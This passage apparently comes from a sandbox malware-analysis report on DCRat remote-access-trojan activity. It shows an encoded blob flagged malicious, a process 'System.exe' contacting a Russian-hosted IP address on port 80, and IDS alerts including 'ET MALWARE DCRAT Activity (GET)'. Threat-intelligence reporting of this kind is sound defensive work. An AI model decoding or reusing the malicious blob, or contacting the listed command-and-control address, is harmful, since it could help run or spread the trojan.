ZFSkhmUzUVNShVYyw2RkpmRrl0cJl2YsR2VZVnRXR1ZwcVW5RmMilnQslkNJlHZ2JVbiBHZGZFRGtWSzlUaUl2bqlEdGJTWpZlMWpHbtl0cJN1Vp9maJxWNyI2bCNjY550Vh5kTYFWa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFTUpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMSl2dpl0TKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlUeNRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKNVW1VzVaBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwpESkpnVYF1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWSq5kMNpGTyUERMVTUE1Ue0M0TwkUaPlWTyI2cKNETpFlVRl2bqlUNKhEZ1Z1MipmSDxUaF1mY1Z1VhdlSp9Ua0IjYwR2ValnSDxUaF1mY1Z1VhdlSp9UarhEZw5UbJNXS51Ue0kXTwkkaMFzaqxUMRpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOikTYxMGOzcTN3QTZwQGZ0UTN4gTOzEzN4MzM1QGN4YWNiwiI0QjZjhTZjdDZ4QGMklDMhNGM1Q2MxYWZ2cDMzIGMkhzM4YzN5cTNyIiOikDZ4IjY0UzMkR2Y3EjY0YTM2MTOyUTM1QGOxYzNyYTMiwiIhJWMkVDOlFWOxQDZiNTZ2YmNxYGOkZjY2YGNwYDMjZjMiRWYyIjY5IiOiYzMhhjYwAjMyQzY2MmMxgjYjFjZ1QmYkRWOhZzNhJ2Mis3W | RU | text | 336 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2908 | System.exe | 193.57.137.82:80 | — | Perviy TSOD LLC | RU | malicious |
PID | Process | Class | Message |
---|---|---|---|
2908 | System.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
2908 | System.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
2908 | System.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
2908 | System.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
2908 | System.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
2908 | System.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
2908 | System.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
2908 | System.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
2908 | System.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
2908 | System.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |